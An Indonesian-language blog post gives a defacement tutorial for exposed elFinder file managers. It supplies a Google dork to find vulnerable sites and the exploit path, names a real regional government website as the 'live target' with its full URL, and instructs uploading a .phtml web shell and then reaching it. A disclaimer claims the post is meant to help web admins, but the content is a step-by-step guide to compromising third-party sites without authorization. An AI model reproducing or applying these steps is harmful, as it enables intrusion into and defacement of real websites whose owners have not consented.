Tutorial Deface elFinder + Upload Shell

Naufal Ardhani - Hallo gaess kali ini gua bakal bagiin Tutorial Deface elFinder + Upload Shell, Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v
dan pas gua lagi Pentest web http://labuankec.pandeglangkab.go.id/ gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel.

Dork :

• inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln )

Exploit :

• www.site.com/[path]/elfinder/elfinder.php.html

Live Target : http://labuankec.pandeglangkab.go.id/

Step :

1. Dorking di google, pilih target dan kasih exploit satu satu
2. dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder/elfinder.php.html
   
3. Langsung aja Upload Shell dengan ekstensi .phtml 
   
4. lalu Akses deh Shellnya di www.site.com/[path]/elfinder/files/oxy.phtml
   

Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya.

nb : saya tidak bertanggung jawab atas apa yang kalian telah lakukan karna saya hanya membagikan ilmu untuk membantu admin web :3

Share this

Author : Sutarno Wirjo

"Halo, saya Sutarno Wirjo seorang bapak dari anak dan pekerja abdi negara maniak depan kompiuter yang tidak berhenti belajar dan senang mengeksplorasi kreativitas pada waktu luang saya. Hobi dengar musik , tarik suara, baca-baca dan penikmat kuliner kelas ampera emperan.

Related Posts